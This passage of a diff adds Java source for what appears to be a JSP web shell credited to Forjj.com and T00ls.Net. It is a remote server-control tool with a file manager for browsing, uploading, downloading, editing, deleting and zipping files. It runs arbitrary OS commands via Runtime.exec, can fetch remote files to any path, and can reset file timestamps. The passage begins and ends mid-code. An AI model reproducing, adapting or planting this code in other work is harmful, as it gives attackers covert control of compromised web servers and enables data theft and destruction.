+JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw);
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MyComparator implements Comparator<File>{
+public int compare(File f1,File f2) {
+if (f1 != null && f2!= null) {
+if (f1.isDirectory()) {
+if (f2.isDirectory()) {
+return f1.getName().compareTo(f2.getName());
+} else {
+return -1;
+}
+} else { 
+if (f2.isDirectory()) {
+return 1;
+} else {
+return  f1.getName().compareTo(f2.getName());
+}
+}
+}
+return 0;
+}
+}
+private static class FileListInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception {
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("folder");
+if (Util.isEmpty(path))
+path = JSession.getAttribute(CURRENT_DIR).toString();
+
+JSession.setAttribute(CURRENT_DIR,Util.convertPath(path));
+File file = new File(path);
+if (!file.exists()) {
+throw new Exception(path+"Dont Exists !");
+}
+JSession.setAttribute(CURRENT_DIR,path);
+File[] list = file.listFiles();
+Arrays.sort(list,new MyComparator());
+out.println("<div style='margin:10px'>");
+String cr = null;
+try {
+cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3);
+}catch(Exception e) {
+cr = "/";
+}
+File currentRoot = new File(cr);
+out.println("<h2>File Manager - Current disk &quot;"+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"&quot; total "+Util.getSize(currentRoot.getTotalSpace(),'G')+"</h2>");
+out.println("<form action=\""+SHELL_NAME+"\" method=\"post\">"+
+"<table width=\"98%\" border=\"0\" cellpadding=\"0\" cellspacing=\"0\" style=\"margin:10px 0;\">"+
+"  <tr>"+
+"    <td nowrap>Current Directory  <input type=\"hidden\" name=\"o\" value=\"filelist\"/></td>"+
+"	<td width=\"98%\"><input class=\"input\" name=\"folder\" value=\""+JSession.getAttribute(CURRENT_DIR)+"\" type=\"text\" style=\"width:100%;margin:0 8px;\"></td>"+
+"    <td nowrap><input class=\"bt\" value=\"GO\" type=\"submit\"></td>"+
+"  </tr>"+
+"</table>"+
+"</form>");
+out.println("<table width=\"98%\" border=\"0\" cellpadding=\"4\" cellspacing=\"0\">"+
+"<form action=\""+SHELL_NAME+"?o=upload\" method=\"POST\" enctype=\"multipart/form-data\"><tr class=\"alt1\"><td colspan=\"7\" style=\"padding:5px;\">"+
+"<div style=\"float:right;\"><input class=\"input\" name=\"file\" value=\"\" type=\"file\" /> <input class=\"bt\" name=\"doupfile\" value=\"Upload\" type=\"submit\" /></div>"+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(WEB_ROOT)+"'}).subdir()\">Web Root</a>"+
+" | <a href=\"javascript:new fso({path:'"+Util.convertPath(SHELL_DIR)+"'}).subdir()\">Shell Directory</a>"+
+" | <a href=\"javascript:new fso({}).mkdir()\">New Directory</a> | <a href=\"javascript:new fso({}).createFile()\">New File</a>"+
+" | ");
+File[] roots = file.listRoots();
+for (int i = 0;i<roots.length;i++) {
+File r = roots[i];
+out.println("<a href=\"javascript:new fso({path:'"+Util.convertPath(r.getPath())+"'}).subdir();\">Disk("+Util.convertPath(r.getPath())+")</a>");
+if (i != roots.length -1) {
+out.println("|");
+} 
+}
+out.println("</td>"+
+"</tr></form>"+
+"<tr class=\"head\"><td>&nbsp;</td>"+
+"  <td>Name</td>"+
+"  <td width=\"16%\">Last Modified</td>"+
+"  <td width=\"10%\">Size</td>"+
+"  <td width=\"20%\">Read/Write/Execute</td>"+
+"  <td width=\"22%\">&nbsp;</td>"+
+"</tr>");
+if (file.getParent() != null) {
+out.println("<tr class=alt1>"+
+"<td align=\"center\"><font face=\"Wingdings 3\" size=4>=</font></td>"+
+"<td nowrap colspan=\"5\"><a href=\"javascript:new fso({path:'"+Util.convertPath(file.getAbsolutePath())+"'}).parent()\">Goto Parent</a></td>"+
+"</tr>");	
+}
+int dircount = 0;
+int filecount = 0;
+for (File f:list) {
+if (f.isDirectory()) {
+dircount ++;
+out.println("<tr class=\"alt2\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt2';\">"+
+"<td width=\"2%\" nowrap><font face=\"wingdings\" size=\"3\">0</font></td>"+
+"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).subdir()\">"+f.getName()+"</a></td>"+
+"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
+"<td nowrap>--</td>"+
+"<td nowrap>"+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>"+
+"<td nowrap><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).removedir()\">Del</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack</a></td>"+
+"</tr>");
+} else {
+filecount++;
+out.println("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"+
+"<td width=\"2%\" nowrap><input type='checkbox' value='"+f.getName()+"'/></td>"+
+"<td><a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">"+f.getName()+"</a></td>"+
+"<td nowrap>"+Util.formatDate(f.lastModified())+"</td>"+
+"<td nowrap>"+Util.getSize(f.length(),'B')+"</td>"+
+"<td nowrap>"+
+""+f.canRead()+" / "+f.canWrite()+" / "+f.canExecute()+"</td>"+
+"<td nowrap>"+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEdit()\">Edit</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).down()\">Down</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).copy()\">Copy</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).move()\">Move</a> | "+
+"<a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"'}).vEditProperty()\">Property</a>");
+if (f.getName().endsWith(".zip")) {
+out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).unpack()\">UnPack</a>");
+} else if (f.getName().endsWith(".rar")) {
+out.println(" | <a href=\"javascript:alert('Dont Support RAR,Please Use WINRAR');\">UnPack</a>");
+} else {
+out.println(" | <a href=\"javascript:new fso({path:'"+Util.convertPath(f.getAbsolutePath())+"',filename:'"+f.getName()+"'}).pack()\">Pack</a>");
+}
+out.println("</td>"+
+"</tr>");
+}
+}
+out.println("<tr class=\"alt2\"><td align=\"center\">&nbsp;</td>"+
+"  <td><a href=\"javascript:new fso({}).packBatch();\">Pack Selected</a> - <a href=\"javascript:new fso({}).deleteBatch();\">Delete Selected</a></td>"+
+"  <td colspan=\"4\" align=\"right\">"+dircount+" directories / "+filecount+" files</td></tr>"+
+"</table>");
+out.println("</div>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+}
+private static class LogoutInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+Object dbo = JSession.getAttribute(DBO);
+if (dbo != null)
+((DBOperator)dbo).close();
+Object obj = JSession.getAttribute(PORT_MAP);
+if (obj != null) {
+ServerSocket s = (ServerSocket)obj;
+s.close();
+}
+Object online = JSession.getAttribute(SHELL_ONLINE);
+if (online != null)
+((OnLineProcess)online).stop();
+JSession.invalidate();
+response.sendRedirect(SHELL_NAME+"?o=vLogin");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class UploadInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+UploadBean fileBean = new UploadBean();
+response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString());
+fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString());
+fileBean.parseRequest(request);
+JSession.setAttribute(MSG,"Upload File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class CopyInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String src = request.getParameter("src");
+String to = request.getParameter("to");
+BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src)));
+BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to)));
+byte[] d = new byte[1024];
+int len = input.read(d);
+while(len != -1) {
+output.write(d,0,len);
+len = input.read(d);
+}
+output.close();
+input.close();
+JSession.setAttribute(MSG,"Copy File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BottomInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+response.getWriter().println("<div style=\"padding:10px;border-bottom:1px solid #fff;border-top:1px solid #ddd;background:#eee;\">Copyright (C) 2009 <a href=\"http://www.forjj.com\" target=\"_blank\">http://www.Forjj.com/</a>&nbsp;&nbsp;<a target=\"_blank\" href=\"http://www.t00ls.net/\">[T00ls.Net]</a> All Rights Reserved."+
+"</div>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VCreateFileInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("filepath");
+File f = new File(path);
+if (!f.isAbsolute()) {
+String oldPath = path;
+path = JSession.getAttribute(CURRENT_DIR).toString();
+if (!path.endsWith("/"))
+path+="/";
+path+=oldPath;
+f = new File(path);
+f.createNewFile();
+} else {
+f.createNewFile();
+}
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Create / Edit File &raquo;</h2>"+
+"<input type='hidden' name='o' value='createFile'>"+
+"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\"  /></p>"+
+"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" ></textarea></p>"+
+"<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\"  type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
+"</form>"+
+"</td></tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VEditInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("filepath");
+File f = new File(path);
+if (f.exists()) {
+BufferedReader reader = new BufferedReader(new FileReader(f));
+StringBuilder content = new StringBuilder();
+String s = reader.readLine();
+while (s != null) {
+content.append(s+"\r\n");
+s = reader.readLine();
+}
+reader.close();
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Create / Edit File &raquo;</h2>"+
+"<input type='hidden' name='o' value='createFile'>"+
+"<p>Current File (import new file name and new file)<br /><input class=\"input\" name=\"filepath\" id=\"editfilename\" value=\""+path+"\" type=\"text\" size=\"100\"  /></p>"+
+"<p>File Content<br /><textarea class=\"area\" id=\"filecontent\" name=\"filecontent\" cols=\"100\" rows=\"25\" >"+Util.htmlEncode(content.toString())+"</textarea></p>"+
+"<p><input class=\"bt\" name=\"submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\"  type=\"button\" value=\"Back\" onclick=\"history.back()\"></p>"+
+"</form>"+
+"</td></tr></table>");
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class CreateFileInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String path = request.getParameter("filepath");
+String content = request.getParameter("filecontent");
+
+BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path)));
+outs.write(content,0,content.length());
+outs.close();
+JSession.setAttribute(MSG,"Save File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class VEditPropertyInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String filepath = request.getParameter("filepath");
+File f = new File(filepath);
+if (!f.exists())
+return;
+String read = f.canRead() ? "checked=\"checked\"" : "";
+String write = f.canWrite() ? "checked=\"checked\"" : "";
+String execute = f.canExecute() ? "checked=\"checked\"" : "";
+Calendar cal = Calendar.getInstance();
+cal.setTimeInMillis(f.lastModified());
+
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Set File Property &raquo;</h2>"+
+"<p>Current file (fullpath)<br /><input class=\"input\" name=\"file\" id=\"file\" value=\""+request.getParameter("filepath")+"\" type=\"text\" size=\"120\"  /></p>"+
+"<input type=\"hidden\" name=\"o\" value=\"editProperty\"> "+
+"<p>Read: "+
+"  <input type=\"checkbox\" "+read+" name=\"read\" id=\"checkbox\"> "+
+"  Write: "+
+"  <input type=\"checkbox\" "+write+" name=\"write\" id=\"checkbox2\"> "+
+"  Execute: "+
+"  <input type=\"checkbox\" "+execute+" name=\"execute\" id=\"checkbox3\">"+
+"</p>"+
+"<p>Instead &raquo;"+
+"year:"+
+"<input class=\"input\" name=\"year\" value="+cal.get(Calendar.YEAR)+" id=\"year\" type=\"text\" size=\"4\"  />"+
+"month:"+
+"<input class=\"input\" name=\"month\" value="+(cal.get(Calendar.MONTH)+1)+" id=\"month\" type=\"text\" size=\"2\"  />"+
+"day:"+
+"<input class=\"input\" name=\"date\" value="+cal.get(Calendar.DATE)+" id=\"date\" type=\"text\" size=\"2\"  />"+
+""+
+"hour:"+
+"<input class=\"input\" name=\"hour\" value="+cal.get(Calendar.HOUR)+" id=\"hour\" type=\"text\" size=\"2\"  />"+
+"minute:"+
+"<input class=\"input\" name=\"minute\" value="+cal.get(Calendar.MINUTE)+" id=\"minute\" type=\"text\" size=\"2\"  />"+
+"second:"+
+"<input class=\"input\" name=\"second\" value="+cal.get(Calendar.SECOND)+" id=\"second\" type=\"text\" size=\"2\"  />"+
+"</p>"+
+"<p><input class=\"bt\" name=\"submit\" value=\"Submit\" id=\"submit\" type=\"submit\" value=\"Submit\"> <input class=\"bt\" name=\"submit\" value=\"Back\" id=\"submit\" type=\"button\" onclick=\"history.back()\"></p>"+
+"</form>"+
+"</td></tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class EditPropertyInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String f = request.getParameter("file");
+File file = new File(f);
+if (!file.exists())
+return;
+String read = request.getParameter("read");
+String write = request.getParameter("write");
+String execute = request.getParameter("execute");
+String year = request.getParameter("year");
+String month = request.getParameter("month");
+String date = request.getParameter("date");
+String hour = request.getParameter("hour");
+String minute = request.getParameter("minute");
+String second = request.getParameter("second");
+if (Util.isEmpty(read)) {
+file.setReadable(false);
+} else {
+file.setReadable(true);
+}
+if (Util.isEmpty(write)) {
+file.setWritable(false);
+} else {
+file.setWritable(true);
+}
+if (Util.isEmpty(execute)) {
+file.setExecutable(false);
+} else {
+file.setExecutable(true);
+}
+Calendar cal = Calendar.getInstance();
+cal.set(Calendar.YEAR,Integer.parseInt(year));
+cal.set(Calendar.MONTH,Integer.parseInt(month)-1);
+cal.set(Calendar.DATE,Integer.parseInt(date));
+cal.set(Calendar.HOUR,Integer.parseInt(hour));
+cal.set(Calendar.MINUTE,Integer.parseInt(minute));
+cal.set(Calendar.SECOND,Integer.parseInt(second));
+if(file.setLastModified(cal.getTimeInMillis())){
+JSession.setAttribute(MSG,"Reset File Property Success!");
+} else {
+JSession.setAttribute(MSG,"Reset File Property Failed!");
+}
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VShell
+private static class VsInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String cmd = request.getParameter("command");
+String program = request.getParameter("program");
+if (cmd == null) cmd = "cmd.exe /c set";
+if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt";
+if (JSession.getAttribute(MSG)!=null) {
+Util.outMsg(out,JSession.getAttribute(MSG).toString());
+JSession.removeAttribute(MSG);
+}
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Execute Program &raquo;</h2>"+
+"<p>"+
+"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
+"<input type=\"hidden\" name=\"type\" value=\"program\">"+
+"Parameter<br /><input class=\"input\" name=\"program\" id=\"program\" value=\""+program+"\" type=\"text\" size=\"100\"  />"+
+"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Execute Shell &raquo;</h2>"+
+"<p>"+
+"<input type=\"hidden\" name=\"o\" value=\"shell\">"+
+"<input type=\"hidden\" name=\"type\" value=\"command\">"+
+"Parameter<br /><input class=\"input\" name=\"command\" id=\"command\" value=\""+cmd+"\" type=\"text\" size=\"100\"  />"+
+"<input class=\"bt\" name=\"submit\" id=\"submit\" value=\"Execute\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form>"+
+"</td>"+
+"</tr></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class ShellInvoker extends DefaultInvoker{
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String type = request.getParameter("type");
+if (type.equals("command")) {
+ins.get("vs").invoke(request,response,JSession);
+out.println("<div style='margin:10px'><hr/>");
+out.println("<pre>");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("</pre></div>");
+}
+} else {
+String program = request.getParameter("program");
+if (!Util.isEmpty(program)) {
+Process pro = Runtime.getRuntime().exec(program);
+JSession.setAttribute(MSG,"Program Has Run Success!");
+ins.get("vs").invoke(request,response,JSession);
+}
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DownInvoker extends DefaultInvoker{
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String path  = request.getParameter("path");
+if (Util.isEmpty(path)) 
+return;
+File f = new File(path);
+if (!f.exists()) 
+return;
+response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET));
+BufferedInputStream input = new BufferedInputStream(new FileInputStream(f));
+BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream());
+byte[] data = new byte[1024];
+int len = input.read(data);
+while (len != -1) {
+output.write(data,0,len);
+len = input.read(data);
+}
+input.close();
+output.close();
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+//VDown
+private static class VdInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String savepath = request.getParameter("savepath");
+String url = request.getParameter("url");
+if (Util.isEmpty(url))
+url = "http://www.forjj.com/";
+if (Util.isEmpty(savepath)) {
+savepath = JSession.getAttribute(CURRENT_DIR).toString();
+}
+if (!Util.isEmpty(JSession.getAttribute("done"))) {
+Util.outMsg(out,"Download Remote File Success!");
+JSession.removeAttribute("done");
+}
+out.println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>"+
+"<form name=\"form1\" id=\"form1\" action=\""+SHELL_NAME+"\" method=\"post\" >"+
+"<h2>Remote File DownLoad &raquo;</h2>"+
+"<p>"+
+"<input type=\"hidden\" name=\"o\" value=\"downRemote\">"+
+"Remote File URL:"+
+"  <input class=\"input\" name=\"url\" value=\""+url+"\" id=\"url\" type=\"text\" size=\"70\"  />"+
+"Save Path:"+
+"<input class=\"input\" name=\"savepath\" id=\"savepath\" value=\""+savepath+"\" type=\"text\" size=\"70\"  />"+
+"<input class=\"bt\" name=\"connect\" id=\"connect\" value=\"DownLoad\" type=\"submit\" size=\"100\"  />"+
+"</p>"+
+"</form></table>");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class DownRemoteInvoker extends DefaultInvoker {
+public boolean doBefore(){return true;}
+public boolean doAfter(){return true;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String downFileUrl = request.getParameter("url");
+String savePath = request.getParameter("savepath");
+if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath))
+return;
+URL downUrl = new URL(downFileUrl);
+URLConnection conn = downUrl.openConnection();
+BufferedInputStream in = new BufferedInputStream(conn.getInputStream());
+BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath)));
+byte[] data = new byte[1024];
+int len = in.read(data);
+while (len != -1) {
+out.write(data,0,len);
+len = in.read(data);
+}
+in.close();
+out.close();
+JSession.setAttribute("done","d");
+ins.get("vd").invoke(request,response,JSession);
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class IndexInvoker extends DefaultInvoker {
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+ins.get("filelist").invoke(request,response,JSession);
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MkDirInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String name = request.getParameter("name");
+File f = new File(name);
+if (!f.isAbsolute()) {
+String path = JSession.getAttribute(CURRENT_DIR).toString();
+if (!path.endsWith("/"))
+path += "/";
+path += name;
+f = new File(path);
+}
+f.mkdirs();
+JSession.setAttribute(MSG,"Make Directory Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MoveInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String src = request.getParameter("src");
+String target  = request.getParameter("to");
+if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
+File file = new File(src);
+if(file.renameTo(new File(target))) {
+JSession.setAttribute(MSG,"Move File Success!");
+} else {
+String msg = "Move File Failed!";
+if (file.isDirectory()) {
+msg += "The Move Will Failed When The Directory Is Not Empty.";
+}
+JSession.setAttribute(MSG,msg);
+}
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class RemoteDirInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String dir = request.getParameter("dir");
+File file = new File(dir);
+if (file.exists()) {
+deleteFile(file);
+deleteDir(file);
+}
+
+JSession.setAttribute(MSG,"Remove Directory Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+public void deleteFile(File f) {
+if (f.isFile()) {
+f.delete();
+}else {
+File[] list = f.listFiles();
+for (File ff:list) {
+deleteFile(ff);
+}
+}
+}
+public void deleteDir(File f) {
+File[] list = f.listFiles();
+if (list.length == 0) {
+f.delete();
+} else {
+for (File ff:list) {
+deleteDir(ff);
+}
+deleteDir(f);
+}
+}
+}
+private static class PackBatchInvoker extends DefaultInvoker{
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String files = request.getParameter("files");
+if (Util.isEmpty(files))
+return;
+String saveFileName = request.getParameter("savefilename");
+File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+if (saveF.exists()) {
+JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+String[] arr = files.split(",");
+for (String f:arr) {
+File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f);
+ZipEntry entry = new ZipEntry(pF.getName());
+zout.putNextEntry(entry);
+FileInputStream fInput = new FileInputStream(pF);
+int len = 0;
+byte[] buf = new byte[1024];
+while ((len = fInput.read(buf)) != -1) {
+zout.write(buf, 0, len);
+zout.flush();
+}
+fInput.close();
+}
+zout.close();
+JSession.setAttribute(MSG,"Pack Files Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+}
+private static class PackInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String packedFile = request.getParameter("packedfile");
+if (Util.isEmpty(packedFile))
+return;
+String saveFileName = request.getParameter("savefilename");
+File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+if (saveF.exists()) {
+JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+File pF = new File(packedFile);
+ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+String base = "";
+if (pF.isDirectory()) {
+zipDir(pF,base,zout);
+} else {
+zipFile(pF,base,zout);
+}
+zout.close();
+JSession.setAttribute(MSG,"Pack File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+public void zipDir(File f,String base,ZipOutputStream zout)  throws Exception {
+if (f.isDirectory()) {
+File[] arr = f.listFiles();
+for (File ff:arr) {
+String tmpBase = base;
+if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
+tmpBase += "/";
+zipDir(ff,tmpBase+f.getName(),zout);
+}
+} else {
+String tmpBase = base;
+if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/"))
+tmpBase += "/";
+zipFile(f,tmpBase,zout);
+}
+}
+public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{
+ZipEntry entry = new ZipEntry(base+f.getName());
+zout.putNextEntry(entry);
+FileInputStream fInput = new FileInputStream(f);
+int len = 0;
+byte[] buf = new byte[1024];
+while ((len = fInput.read(buf)) != -1) {
+zout.write(buf, 0, len);
+zout.flush();
+}
+fInput.close();
+}
+}
+private static class UnPackInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String savepath = request.getParameter("savepath");
+String zipfile = request.getParameter("zipfile");
+if (Util.isEmpty(savepath) || Util.isEmpty(zipfile))
+return;
+File save = new File(savepath);
+save.mkdirs();
+ZipFile file = new ZipFile(new File(zipfile));   
+Enumeration e = file.entries();   
+while (e.hasMoreElements()) {   
+ZipEntry en = (ZipEntry) e.nextElement(); 
+String entryPath = en.getName();
+int index = entryPath.lastIndexOf("/");
+if (index != -1)
+entryPath = entryPath.substring(0,index);
+File absEntryFile = new File(save,entryPath);
+if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) 
+absEntryFile.mkdirs();
+BufferedOutputStream output = null;
+BufferedInputStream input = null;
+try {
+output = new BufferedOutputStream(   
+new FileOutputStream(new File(save,en.getName())));   
+input = new BufferedInputStream(   
+file.getInputStream(en));   
+byte[] b = new byte[1024];   
